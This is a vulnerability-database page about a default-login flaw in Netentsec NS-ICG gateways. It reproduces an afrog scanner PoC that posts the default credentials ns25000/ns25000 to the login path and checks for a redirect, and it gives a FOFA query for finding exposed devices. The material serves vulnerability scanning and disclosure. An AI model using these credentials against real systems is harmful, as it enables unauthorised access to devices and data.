ns-icg-default-password: NS-ICG Default Password

日期: 2025-09-01 | 影响软件: nsicg | POC: 已公开

漏洞描述

Netentsec NS-ICG contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. FOFA: "NS-ICG"

PoC代码[已公开]

id: ns-icg-default-password

info:
  name: NS-ICG Default Password
  author: pikpikcu
  severity: high
  verified: true
  description: |
    Netentsec NS-ICG contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
    FOFA: "NS-ICG"
  reference:
    - https://www.cnvd.org.cn/flaw/show/CNVD-2016-08603
  tags: nsicg,default-login
  created: 2023/06/17

rules:
  r0:
    request:
      method: POST
      path: /user/login/login
      body: usrname=ns25000&pass=ns25000&signinfo=&ukey_user_flag=0&SlotSerialNumber=&agree=
    expression: response.status == 302 && response.raw_header.bcontains(b'/user/main/')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/default-pwd/ns-icg-default-password.yaml

相关漏洞推荐